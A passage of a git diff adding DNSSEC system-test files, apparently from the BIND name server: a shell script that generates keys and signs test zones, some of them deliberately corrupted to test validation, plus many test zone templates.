CBKoJSkZzdpwiON7JS4yPFY5VVeBjfT19x/O + vx+5UK1JZUNKhTXWWgW1er+JlLzNf4Ot40+l + z9HUTyaeS0eWyw== ) +z.rfc2335.example. 300 IN A 10.0.0.26 + 300 SIG A 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + ccqjVHnehvVwlNNd4+7n/GzGlRjj+ul0gCT3 + X3950LTccxHsOFyjNNm8v/Ho/aurSYdqXEjY + jwmjC6elwkzB7A== ) + 300 NXT rfc2335.example. A SIG NXT + 300 SIG NXT 1 3 300 20040530021915 ( + 20040430021915 47799 rfc2335.example. + W42WoFyd9erysv8HjKo+CpHIH1x6+pAKwCDO + /hHnkEpQI3brewxl7cWOPYeA92Ns80Ody/ui + m2E28A5gnmWqPw== ) diff --git a/bin/tests/system/dnssec/ns2/sign.sh b/bin/tests/system/dnssec/ns2/sign.sh new file mode 100644 index 0000000..bb6c254 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/sign.sh @@ -0,0 +1,333 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +set -e + +# Sign child zones (served by ns3). +( cd ../ns3 && $SHELL sign.sh ) + +echo_i "ns2/sign.sh" + +# Get the DS records for the "trusted." and "managed." zones. +for subdomain in secure unsupported disabled enabled +do + cp "../ns3/dsset-$subdomain.managed$TP" . + cp "../ns3/dsset-$subdomain.trusted$TP" . +done + +# Sign the "trusted." and "managed." zones. +zone=managed. +infile=key.db.in +zonefile=managed.db + +keyname1=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone -f KSK "$zone") +keyname2=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone "$zone") + +cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile" + +"$SIGNER" -P -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1 + +zone=trusted. +infile=key.db.in +zonefile=trusted.db + +keyname1=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone -f KSK "$zone") +keyname2=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone "$zone") + +cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile" + +"$SIGNER" -P -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1 + +# The "example." zone. +zone=example. +infile=example.db.in +zonefile=example.db + +# Get the DS records for the "example." zone. +for subdomain in secure badds bogus dynamic keyless nsec3 optout \ + nsec3-unknown optout-unknown multiple rsasha256 rsasha512 \ + kskonly update-nsec3 auto-nsec auto-nsec3 secure.below-cname \ + ttlpatch split-dnssec split-smart expired expiring upper lower \ + dnskey-unknown dnskey-unsupported dnskey-unsupported-2 \ + dnskey-nsec3-unknown managed-future revkey \ + dname-at-apex-nsec3 occluded +do + cp "../ns3/dsset-$subdomain.example$TP" . +done + +# Sign the "example." zone. +keyname1=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone -f KSK "$zone") +keyname2=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone "$zone") + +cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile" + +"$SIGNER" -P -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1 + +# +# lower/uppercase the signature bits with the exception of the last characters +# changing the last 4 characters will lead to a bad base64 encoding. +# + +zonefiletmp=$(mktemp "$zonefile.XXXXXX") || exit 1 +"$CHECKZONE" -D -q -i local "$zone" "$zonefile.signed" | +tr -d '\r' | +awk ' +tolower($1) == "bad-cname.example." && $4 == "RRSIG" && $5 == "CNAME" { + for (i = 1; i <= NF; i++ ) { + if (i <= 12) { + printf("%s ", $i); + continue; + } + prefix = substr($i, 1, length($i) - 4); + suffix = substr($i, length($i) - 4, 4); + if (i > 12 && tolower(prefix) != prefix) + printf("%s%s", tolower(prefix), suffix); + else if (i > 12 && toupper(prefix) != prefix) + printf("%s%s", toupper(prefix), suffix); + else + printf("%s%s ", prefix, suffix); + } + printf("\n"); + next; +} + +tolower($1) == "bad-dname.example." && $4 == "RRSIG" && $5 == "DNAME" { + for (i = 1; i <= NF; i++ ) { + if (i <= 12) { + printf("%s ", $i); + continue; + } + prefix = substr($i, 1, length($i) - 4); + suffix = substr($i, length($i) - 4, 4); + if (i > 12 && tolower(prefix) != prefix) + printf("%s%s", tolower(prefix), suffix); + else if (i > 12 && toupper(prefix) != prefix) + printf("%s%s", toupper(prefix), suffix); + else + printf("%s%s ", prefix, suffix); + } + printf("\n"); + next; +} + +{ print; }' > "$zonefiletmp" && mv "$zonefiletmp" "$zonefile.signed" + +# +# signed in-addr.arpa w/ a delegation for 10.in-addr.arpa which is unsigned. +# +zone=in-addr.arpa. +infile=in-addr.arpa.db.in +zonefile=in-addr.arpa.db + +keyname1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +keyname2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile" +"$SIGNER" -P -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1 + +# Sign the badparam secure file + +zone=badparam. +infile=badparam.db.in +zonefile=badparam.db + +keyname1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +keyname2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile" + +"$SIGNER" -P -3 - -H 1 -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1 + +sed -e 's/IN NSEC3 1 0 1 /IN NSEC3 1 0 10 /' "$zonefile.signed" > "$zonefile.bad" + +# Sign the single-nsec3 secure zone with optout + +zone=single-nsec3. +infile=single-nsec3.db.in +zonefile=single-nsec3.db + +keyname1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +keyname2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keyname1.key" "$keyname2.key" > "$zonefile" + +"$SIGNER" -P -3 - -A -H 1 -g -o "$zone" -k "$keyname1" "$zonefile" "$keyname2" > /dev/null 2>&1 + +# +# algroll has just has the old DNSKEY records removed and is waiting +# for them to be flushed from caches. We still need to generate +# RRSIGs for the old DNSKEY. +# +zone=algroll. +infile=algroll.db.in +zonefile=algroll.db + +keyold1=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone -f KSK "$zone") +keyold2=$("$KEYGEN" -q -a "$ALTERNATIVE_ALGORITHM" -b "$ALTERNATIVE_BITS" -n zone "$zone") +keynew1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +keynew2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") + +cat "$infile" "$keynew1.key" "$keynew2.key" > "$zonefile" + +"$SIGNER" -P -o "$zone" -k "$keyold1" -k "$keynew1" "$zonefile" "$keyold1" "$keyold2" "$keynew1" "$keynew2" > /dev/null 2>&1 + +# +# Make a zone big enough that it takes several seconds to generate a new +# nsec3 chain. +# +zone=nsec3chain-test +zonefile=nsec3chain-test.db +cat > "$zonefile" << EOF +\$TTL 10 +@ 10 SOA ns2 hostmaster 0 3600 1200 864000 1200 +@ 10 NS ns2 +@ 10 NS ns3 +ns2 10 A 10.53.0.2 +ns3 10 A 10.53.0.3 +EOF +i=1 +while [ $i -le 300 ]; do + echo "host$i 10 IN NS ns.elsewhere" + i=$((i+1)) +done >> "$zonefile" +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$key1.key" "$key2.key" >> "$zonefile" +"$SIGNER" -P -3 - -A -H 1 -g -o "$zone" -k "$key1" "$zonefile" "$key2" > /dev/null 2>&1 + +zone=cds.secure +infile=cds.secure.db.in +zonefile=cds.secure.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +"$DSFROMKEY" -C "$key1.key" > "$key1.cds" +cat "$infile" "$key1.key" "$key2.key" "$key1.cds" >$zonefile +"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1 + +zone=cds-x.secure +infile=cds.secure.db.in +zonefile=cds-x.secure.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key3=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +"$DSFROMKEY" -C "$key2.key" > "$key2.cds" +cat "$infile" "$key1.key" "$key2.key" "$key3.key" "$key2.cds" > "$zonefile" +"$SIGNER" -P -g -x -o "$zone" "$zonefile" > /dev/null 2>&1 + +zone=cds-update.secure +infile=cds-update.secure.db.in +zonefile=cds-update.secure.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$key1.key" "$key2.key" > "$zonefile" +"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1 + +zone=cds-kskonly.secure +infile=cds-kskonly.secure.db.in +zonefile=cds-kskonly.secure.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$key1.key" "$key2.key" > "$zonefile" +"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1 +keyfile_to_key_id "$key1" > cds-kskonly.secure.id + +zone=cds-auto.secure +infile=cds-auto.secure.db.in +zonefile=cds-auto.secure.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +$SETTIME -P sync now "$key1" > /dev/null +cat "$infile" > "$zonefile.signed" + +zone=cdnskey.secure +infile=cdnskey.secure.db.in +zonefile=cdnskey.secure.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +sed 's/DNSKEY/CDNSKEY/' "$key1.key" > "$key1.cds" +cat "$infile" "$key1.key" "$key2.key" "$key1.cds" > "$zonefile" +"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1 + +zone=cdnskey-x.secure +infile=cdnskey.secure.db.in +zonefile=cdnskey-x.secure.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key3=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +sed 's/DNSKEY/CDNSKEY/' "$key1.key" > "$key1.cds" +cat "$infile" "$key1.key" "$key2.key" "$key3.key" "$key1.cds" > "$zonefile" +"$SIGNER" -P -g -x -o "$zone" "$zonefile" > /dev/null 2>&1 + +zone=cdnskey-update.secure +infile=cdnskey-update.secure.db.in +zonefile=cdnskey-update.secure.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$key1.key" "$key2.key" > "$zonefile" +"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1 + +zone=cdnskey-kskonly.secure +infile=cdnskey-kskonly.secure.db.in +zonefile=cdnskey-kskonly.secure.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$key1.key" "$key2.key" > "$zonefile" +"$SIGNER" -P -g -o "$zone" "$zonefile" > /dev/null 2>&1 +keyfile_to_key_id "$key1" > cdnskey-kskonly.secure.id + +zone=cdnskey-auto.secure +infile=cdnskey-auto.secure.db.in +zonefile=cdnskey-auto.secure.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +$SETTIME -P sync now "$key1" > /dev/null +cat "$infile" > "$zonefile.signed" + +zone=updatecheck-kskonly.secure +infile=template.secure.db.in +zonefile=${zone}.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +# Save key id's for checking active key usage +keyfile_to_key_id "$key1" > $zone.ksk.id +keyfile_to_key_id "$key2" > $zone.zsk.id +echo "${key1}" > $zone.ksk.key +echo "${key2}" > $zone.zsk.key +# Add CDS and CDNSKEY records +sed 's/DNSKEY/CDNSKEY/' "$key1.key" > "$key1.cdnskey" +"$DSFROMKEY" -C "$key1.key" > "$key1.cds" +cat "$infile" "$key1.key" "$key2.key" "$key1.cdnskey" "$key1.cds" > "$zonefile" +# Don't sign, let auto-dnssec maintain do it. +mv $zonefile "$zonefile.signed" + +zone=hours-vs-days +infile=hours-vs-days.db.in +zonefile=hours-vs-days.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +$SETTIME -P sync now "$key1" > /dev/null +cat "$infile" > "$zonefile.signed" + +# +# Negative result from this zone should come back as insecure. +# +zone=too-many-iterations +infile=too-many-iterations.db.in +zonefile=too-many-iterations.db +key1=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone -f KSK "$zone") +key2=$("$KEYGEN" -q -a "$DEFAULT_ALGORITHM" -b "$DEFAULT_BITS" -n zone "$zone") +cat "$infile" "$key1.key" "$key2.key" > "$zonefile" +"$SIGNER" -P -3 - -H too-many -g -o "$zone" "$zonefile" > /dev/null 2>&1 diff --git a/bin/tests/system/dnssec/ns2/single-nsec3.db.in b/bin/tests/system/dnssec/ns2/single-nsec3.db.in new file mode 100644 index 0000000..b2e3c13 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/single-nsec3.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns2.example. . ( + 2010042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2.example. +delegation NS ns3.example. diff --git a/bin/tests/system/dnssec/ns2/template.secure.db.in b/bin/tests/system/dnssec/ns2/template.secure.db.in new file mode 100644 index 0000000..aa3aaab --- /dev/null +++ b/bin/tests/system/dnssec/ns2/template.secure.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns2.example. . 1 3600 1200 86400 1200 +@ NS ns2.example. diff --git a/bin/tests/system/dnssec/ns2/too-many-iterations.db.in b/bin/tests/system/dnssec/ns2/too-many-iterations.db.in new file mode 100644 index 0000000..1527e07 --- /dev/null +++ b/bin/tests/system/dnssec/ns2/too-many-iterations.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 30 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +*.a A 10.0.0.3 +b A 10.0.0.2 +d A 10.0.0.4 diff --git a/bin/tests/system/dnssec/ns3/auto-nsec.example.db.in b/bin/tests/system/dnssec/ns3/auto-nsec.example.db.in new file mode 100644 index 0000000..a7792fd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/auto-nsec.example.db.in @@ -0,0 +1,40 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + +nosoa NS ns.nosoa +ns.nosoa A 10.53.0.7 + +normalthenrrsig A 10.0.0.28 +rrsigonly A 10.0.0.29 diff --git a/bin/tests/system/dnssec/ns3/auto-nsec3.example.db.in b/bin/tests/system/dnssec/ns3/auto-nsec3.example.db.in new file mode 100644 index 0000000..a7792fd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/auto-nsec3.example.db.in @@ -0,0 +1,40 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + +nosoa NS ns.nosoa +ns.nosoa A 10.53.0.7 + +normalthenrrsig A 10.0.0.28 +rrsigonly A 10.0.0.29 diff --git a/bin/tests/system/dnssec/ns3/bogus.example.db.in b/bin/tests/system/dnssec/ns3/bogus.example.db.in new file mode 100644 index 0000000..0feb441 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/bogus.example.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/dnssec/ns3/dname-at-apex-nsec3.example.db.in b/bin/tests/system/dnssec/ns3/dname-at-apex-nsec3.example.db.in new file mode 100644 index 0000000..e758cdd --- /dev/null +++ b/bin/tests/system/dnssec/ns3/dname-at-apex-nsec3.example.db.in @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns3.example. . 1 1200 1200 1814400 3600 +@ NS ns3.example. +@ DNAME example. diff --git a/bin/tests/system/dnssec/ns3/dnskey-nsec3-unknown.example.db.in b/bin/tests/system/dnssec/ns3/dnskey-nsec3-unknown.example.db.in new file mode 100644 index 0000000..f37dd75 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/dnskey-nsec3-unknown.example.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.e A 10.0.0.6 +child NS ns2.example. diff --git a/bin/tests/system/dnssec/ns3/dnskey-unknown.example.db.in b/bin/tests/system/dnssec/ns3/dnskey-unknown.example.db.in new file mode 100644 index 0000000..f37dd75 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/dnskey-unknown.example.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.e A 10.0.0.6 +child NS ns2.example. diff --git a/bin/tests/system/dnssec/ns3/dnskey-unsupported-2.example.db.in b/bin/tests/system/dnssec/ns3/dnskey-unsupported-2.example.db.in new file mode 100644 index 0000000..f37dd75 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/dnskey-unsupported-2.example.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.e A 10.0.0.6 +child NS ns2.example. diff --git a/bin/tests/system/dnssec/ns3/dnskey-unsupported.example.db.in b/bin/tests/system/dnssec/ns3/dnskey-unsupported.example.db.in new file mode 100644 index 0000000..f37dd75 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/dnskey-unsupported.example.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a A 10.0.0.3 +*.e A 10.0.0.6 +child NS ns2.example. diff --git a/bin/tests/system/dnssec/ns3/dynamic.example.db.in b/bin/tests/system/dnssec/ns3/dynamic.example.db.in new file mode 100644 index 0000000..babf54c --- /dev/null +++ b/bin/tests/system/dnssec/ns3/dynamic.example.db.in @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; This has the NS and glue at the apex because testing RT #2399 +; requires we have only one name in the zone at a certain point +; during the test. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS @ +@ A 10.53.0.3 diff --git a/bin/tests/system/dnssec/ns3/expired.example.db.in b/bin/tests/system/dnssec/ns3/expired.example.db.in new file mode 100644 index 0000000..b7706d3 --- /dev/null +++ b/bin/tests/system/dnssec/ns3/expired.example.db.in @@ -0,0 +1,44 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns + MX 10 mx +ns A 10.53.0.3 +mx A 10.0.0.30 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 +a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27 +x CNAME a + +private NS ns.private +ns.private A 10.53.0.2 + +insecure NS ns.insecure +ns.insecure A 10.53.0.2 + +nosoa NS ns.nosoa +ns.nosoa A 10.53.0.7 + +normalthenrrsig A 10.0.0.28 +rrsigonly A 